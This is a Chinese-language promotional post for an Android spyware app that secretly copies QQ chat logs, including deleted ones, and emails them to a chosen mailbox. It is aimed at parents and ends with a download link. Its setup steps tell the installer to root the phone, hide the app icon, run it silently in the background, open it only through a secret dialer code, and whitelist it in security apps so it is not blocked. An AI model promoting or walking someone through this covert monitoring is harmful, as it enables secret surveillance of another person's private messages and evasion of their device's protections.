国内首款android手机QQ聊天记录监控器,唯一能直接在手机安装的手机QQ监控软件,让家长随时随地掌握子女的手机QQ聊天记录内容,支持android手机QQ2011,2.0-2.3以及QQ2012,QQ2013,QQ2014,QQ2015,QQ2016等版本。无需QQ登录密码,直接在手机上查看本机的所有QQ聊天记录。远程监控可以每天自动将聊天记录发送到设定的邮箱(包括删除的记录),全后台无界面运行,无需手动干预。 全面支持android2.2-android6.x各版本。

前提:针对安卓手机。必须有ROOT权限。(安装“刷机大师”,可以轻松实现手机ROOT。)
功能
1、可以查看没有被删除的qq历史记录
(试用版只能查看文字记录 正式版功能:可以查看文字 语音 图片 视频数据)
2、新聊记录不怕删除 可以及时备份边聊边删记录
3、定时发送邮箱 实现远程查看
安装方法
1、把本软件安装到手机。
2、打开手机,运行程序(如手机提示申请root权限,请点“允许”)
3、登录密码:520(默认密码可以修改,只能为数字)
4、设置相关安全软件,再点本软件中的“隐藏图标”实现无图标。
5、关闭程序后,在后台记录。
如何调出软件
拔号盘拔打密码呼出软件。
关于邮箱设置
1、可以使用QQ 163 126邮箱 新浪 139 gmail 等邮箱 前提需要打开SMTP服务
不过现在的邮箱SMTP服务政策变化很快 有些新申请的邮箱即使打开SMTP服务 也不一定能用 建议使用以前申请过的老邮箱使用
关于杀软设置
需要在360或手机管家里面把软件加为信任 允许开机自启和加入内存优化白名单

https://yunpan.cn/cMjxUPxQYJk4N

欢迎留言

2 条评论